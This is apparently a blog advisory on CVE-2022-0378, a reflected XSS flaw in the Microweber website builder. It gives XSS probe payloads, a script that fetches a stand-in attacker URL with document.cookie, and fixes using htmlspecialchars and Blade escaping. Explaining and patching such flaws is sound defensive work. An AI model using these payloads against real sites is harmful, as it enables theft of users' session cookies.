Microweber is an open-source drag-and-drop website builder powered by Laravel. It's quite popular within the PHP and Laravel community, particularly for folks wanting a quick, easy CMS. But in early 2022, a serious security hole surfaced—CVE-2022-0378, a *reflected Cross-site Scripting (XSS)* vulnerability. If you're running microweber/microweber on your project and haven't updated since before version 1.2.11, read on—this could affect you or your users.

What is CVE-2022-0378?

This vulnerability allows an attacker to inject malicious JavaScript code into a page by crafting a specially formatted URL. Because the app reflects user input onto the page without proper sanitization, a user clicking such a link could have scripts run in the context of their browser. That could mean:

- Stolen cookies (authentication/session tokens)
- Redirection to malicious sites

Severity (CVSS): 6.1 (Medium), but with creative exploitation, effects can be severe.

Affected package: microweber/microweber  
Vulnerable versions: Before 1.2.11

The Flaw

The problem lies in how Microweber handles and outputs user-supplied input in URLs (like a query parameter). For instance, suppose you have a page that reflects the value of a search parameter directly into the site’s HTML, like this:

// Vulnerable code snippet (simplified for clarity)
if (isset($_GET['search'])) {
    echo "You searched for: " . $_GET['search'];
}

If there's no sanitization or escaping, an attacker can inject HTML or JavaScript code through the search parameter.

Say someone visits

https://your-microweber-site.com/?search=<script>alert('XSS')</script>

If the code is vulnerable and directly reflects search, the page's output becomes

You searched for: <script>alert('XSS')</script>

And poof—a popup appears. In real attacks, hackers may attempt to steal session cookies or redirect users, not just show a popup.

<script>
  fetch('https://evil-attacker.com/steal?c=' + document.cookie);
</script>

If a user clicks a maliciously crafted link, their browser might silently send their cookie to the attacker's server.

Try inserting this into any input fields, forms, or URLs (as a parameter value):

"><script>alert('CVE-2022-0378')</script>

If you see a popup when the page renders, you’re likely vulnerable.

Fixing the Vulnerability

Microweber fixed CVE-2022-0378 in version 1.2.11.

If you’re running anything older, upgrade now:

composer update microweber/microweber

Also, always sanitize and escape any user-supplied data when outputting it in HTML. In PHP, you can use:

echo htmlspecialchars($_GET['search'], ENT_QUOTES, 'UTF-8');

Frameworks like Laravel provide Blade syntax that escapes by default:

{{ $user_input }}
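The following is an added example, not Microweber's own code, that puts the article's vulnerable pattern next to its hardened form and runs the article's test payloads through both, so you can see the check from "Try inserting this..." and the `htmlspecialchars` fix above side by side. The function names (`renderSearchVulnerable`, `renderSearchSafe`, `containsRawTag`) are hypothetical and exist only for this demonstration; the input strings are constructed from the probes quoted earlier in the post.

```php
<?php
// Added example (not Microweber's own code): the article's vulnerable
// reflection pattern beside a hardened version, plus a self-check that
// feeds the article's probe strings through both renderers.
// renderSearchVulnerable, renderSearchSafe and containsRawTag are
// hypothetical names used only here.

declare(strict_types=1);

// The "before": reflects the raw query parameter, as in the article's snippet.
function renderSearchVulnerable(string $search): string
{
    return "You searched for: " . $search;
}

// The "after": escape for the HTML body/attribute context before output.
// ENT_QUOTES escapes both ' and ", so the result is also safe inside a
// quoted attribute value; ENT_SUBSTITUTE replaces invalid UTF-8 instead
// of returning an empty string.
function renderSearchSafe(string $search): string
{
    return "You searched for: "
        . htmlspecialchars($search, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Detection helper for the self-check: true if the rendered output still
// contains an unescaped HTML tag, i.e. the input was reflected as markup.
function containsRawTag(string $html): bool
{
    return preg_match('/<[a-z!\/]/i', $html) === 1;
}

// Constructed inputs: the two probes quoted in the article and a benign term.
$probes = [
    "<script>alert('XSS')</script>",
    "\"><script>alert('CVE-2022-0378')</script>",
    "laravel cms",
];

foreach ($probes as $probe) {
    $before = renderSearchVulnerable($probe);
    $after  = renderSearchSafe($probe);

    printf("input:      %s\n", $probe);
    printf("vulnerable: %s\n            raw tag reflected: %s\n",
        $before, containsRawTag($before) ? 'YES' : 'no');
    printf("hardened:   %s\n            raw tag reflected: %s\n\n",
        $after, containsRawTag($after) ? 'YES' : 'no');
}
```

Run it with `php example.php`: the vulnerable renderer reports `YES` for both probes, while the hardened one turns `<` into `&lt;` and `"` into `&quot;` so the browser shows the text instead of executing it. Laravel's `{{ }}` does the same thing through its `e()` helper, which wraps `htmlspecialchars` with `ENT_QUOTES`; the unescaped `{!! !!}` form bypasses it and should only ever see trusted data. Note that `htmlspecialchars` is correct for the HTML body and attribute contexts shown here; a value placed inside an existing `<script>` block or a URL needs encoding for that context instead.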

References (Original Sources)

- Packagist Advisories  
- GitHub Security Advisory about microweber  
- NVD CVE-2022-0378  

Final Thoughts & How to Stay Safe

CVE-2022-0378 is a classic reflected XSS vulnerability—simple, but potentially devastating if exploited.

Always update your dependencies, escape user input at output, and test your site for XSS with tools like:

- XSS Hunter
- OWASP ZAP

If you’re running Microweber < 1.2.11, upgrade immediately. One overlooked update could cost you your reputation, data, or users’ trust. 👨‍💻👩‍💻

Timeline

Published on: 01/26/2022 16:15:00 UTC
Last modified on: 02/02/2022 16:03:00 UTC